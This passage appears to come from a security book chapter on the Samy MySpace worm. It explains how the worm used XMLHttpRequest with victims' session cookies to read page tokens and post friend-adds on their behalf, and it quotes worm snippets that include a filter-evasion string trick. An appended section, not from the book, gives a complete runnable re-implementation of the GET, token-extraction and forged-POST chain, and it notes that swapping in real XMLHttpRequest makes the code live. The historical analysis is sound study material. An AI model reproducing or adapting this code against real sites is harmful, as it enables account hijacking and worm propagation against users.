Chapter 4: Malicious JavaScript and AJAX 109

A secondary hurdle for Samy was to force the browser to execute multiple GETs and
POSTs, search page source for specific values, and perform other hostile actions on
behalf of the currently logged-in user. These actions were performed primarily with
XMLHttpRequest, which the browser sends with the victim's own session cookies attached.
The following shows how Samy was able to carry out these steps.
1. Samy needed to force a user's browser to perform GETs to retrieve the user's
current list of heroes. To perform this action, XMLHttpRequest was used,
which was already made possible by item number 4 in the preceding input
filtering bypass section. The following code sample was used by Samy to force
GETs by the browser:

    function getData(AU) {
        // AU is fetched page source. getFromURL (defined elsewhere in the
        // worm, not shown here) returns the value following "friendID=" and
        // "Mytoken=". M and L are globals reused by the later POST.
        M = getFromURL(AU, 'friendID');
        L = getFromURL(AU, 'Mytoken')
    }
2. To find the friendID of the user viewing the page, Samy needed to search the
page source for the specific friendID. Using the eval() function again, Samy
was able to find the value and store it for later use:

    // 'frien' + 'dID' evaluates to the search string 'friendID' without that
    // word ever appearing literally in the payload.
    var index = html.indexOf('frien' + 'dID');
3. From GETs and searches, Samy was able to get a list of friends, but he now
needed to perform a POST to force the user to add Samy as a friend
(and a hero).
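The three steps above form one chain: GET the page as the victim, search the returned source for friendID and Mytoken, then POST with those values. The following is an added illustration of that chain, not the worm's code and not code from the book. The transport object (standing in for XMLHttpRequest so the block runs offline in Node), the /profile and /addfriend paths, the sample HTML, the parameter terminators and the friendID values are all assumptions.

```javascript
// Added illustration of the GET -> search -> POST chain from steps 1-3.
// This is NOT the worm's code and not from the book. The transport object,
// the URL paths, the sample HTML and the parameter terminators are assumptions
// chosen so the chain runs offline in Node.

// Return the value following "<name>=" in text, stopping at a terminator
// (&, quote, space, or <). Returns null if the name is not present.
function getParam(text, name) {
  const key = name + '=';
  const start = text.indexOf(key);
  if (start === -1) return null;
  const valueStart = start + key.length;
  let end = valueStart;
  while (end < text.length && !'&"\' <'.includes(text[end])) end++;
  return text.substring(valueStart, end);
}

// Locate the viewing user's friendID in raw page source. The search string is
// built by concatenation, as the original 'frien' + 'dID' line does, so the
// assembled word never appears literally in the payload.
function findFriendId(html) {
  const index = html.indexOf('frien' + 'dID');
  if (index === -1) return null;
  return getParam(html.substring(index), 'frien' + 'dID');
}

// The chain itself. `transport` stands in for XMLHttpRequest: in a browser the
// requests would carry the victim's session cookies automatically, which is
// what makes the POST run "as" the logged-in user.
function addAttackerAsFriend(transport, profileUrl, attackerId) {
  const html = transport.get(profileUrl);          // step 1: GET the page
  const friendId = findFriendId(html);             // step 2: search the source
  const token = getParam(html, 'Mytoken');
  if (friendId === null || token === null) {
    return { ok: false, reason: 'friendID or Mytoken not found in page' };
  }
  // step 3: POST that adds the attacker. Path and field names are assumed.
  const body = 'friendID=' + encodeURIComponent(attackerId) +
               '&Mytoken=' + encodeURIComponent(token);
  const status = transport.post('/addfriend', body);
  return { ok: status === 200, friendId, token, body };
}

// Constructed sample page (not real MySpace markup) and a fake transport that
// records what was posted.
const SAMPLE_HTML =
  '<html><a href="/profile?friendID=12345678&Mytoken=ABC123">me</a></html>';

function makeFakeTransport(pageHtml) {
  const posted = [];
  return {
    posted,
    get: () => pageHtml,
    post: (url, body) => { posted.push({ url, body }); return 200; },
  };
}

function runDemo() {
  const transport = makeFakeTransport(SAMPLE_HTML);
  const result = addAttackerAsFriend(transport, '/profile', '99');
  return { result, posted: transport.posted };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The injected transport is the only part that differs from a browser: swap it for real XMLHttpRequest calls and the same parsing and body construction apply. Note that the chain fails closed when either value is missing from the page, a check the worm had no reason to make but a re-implementation for testing should.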